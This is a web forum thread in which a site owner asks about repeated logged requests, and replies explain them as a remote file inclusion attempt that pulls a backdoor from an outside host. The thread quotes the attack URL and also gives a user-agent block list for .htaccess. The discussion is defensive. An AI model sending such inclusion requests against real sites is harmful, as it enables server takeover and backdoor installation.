SQL injection attack - What was he attempting?

Hello,

Last night i caught someone attempting some sort of SQL injection on my cPanel account showing in the latest visitors.

The log shows:

index.php?page=http://www.yenzero.com/c.in??
Http Code: 406 Date: Mar 22 08:46:21 Http Version: HTTP/1.1 Size in Bytes: 268
Referer: -
Agent: libwww-perl/5.805

Just a warning, if you go to the URL appended to the end of the string my firewall is throwing up a php_chaploit.r warning and there's a bunch of junk code on the page.

Anyhow, this attempt was happening at the rate of about a request every 10 seconds.. sometimes only 1 second apart. It was coming from range of IP's from all around the place, like hundreds of different addresses.

So i couldn't ban the IP's but i did ban the IP that yenzero URL is on, and also removed my index.php page. The requests kept happening, so i just changed my nameservers to Domainsite parking page (don't like them anyway)

Can anyone give me any further info on this, and would using mod-rewrite to remove the /index.php?page= from my URL's offer any help?

Can anyone give some more input on this?

Thanks, sweetfunny.

 

mod_rewrite is useless for this.You should fix your code.

 

Thanks for your reply.

It didn't appear he got in, as he was only requesting the index.php page over and over again. Or did he actually exploit my code and was using my server for something?

I don't know that my code is even vulnerable, the script did have a vulnerablilty listed on the advisories but i applied the fix for it.

I have no idea, maybe i just point my nameservers back and monitor the logs again.

 

is a lite kid using a premade tool to look for servers vulnerables , only ban the ip best ban the ip range !

 

Well, you can ban the "User-Agent" on your .htaccess file
.
I'm currenlty banning this User-Agents substrings (among others):
"Wget"
"HTTrack"
"WebCopier"
"WebSauger"
"WebReaper"
"WebStripper"
"Web Downloader"
"libwww-perl"
"Python-urllib"

 

If i done that i would have to ban *.*.*.* because every request was coming from a completely different IP and IP range.

BIG Green rep to you, thankyou.

I knew doing something like this was possible for Wget and site rippers, but didn't think it could be done with the "libwww-perl" that was hitting me.

Your a lifesaver.

 

He was trying to include a remote file.This is your start point.

 

As rootbinbash stated, he was trying to perform a remote file include. Google "Remote File Includes" and you should get a ton on information about it.

The file he was trying to access is a backdoor of some sort. When he includes it in your URL he is trying to get your code to execute his code (on your server). This will execute the commands in his file and usually create a new username for him, or allow him access to the server.

Oh, and check to make sure that there are no new files on your server. Specifically in your tmp. I looked at the code and it seems it does a lot of wget's to the tmp directory... so if lots of things start showing up here you might have a problem

He's a script kiddie... I wouldn't worry to much, just ban the IP and secure the remote include (if you're vulnerable).

 

This could be the start of an attack, or a way to make some "noise" in your logs to cover previous actions. I advise you to check your script instead of concentrating on banning the attacker that is quite a unuseful practice since he can use a proxy rotator or a user-agent faker.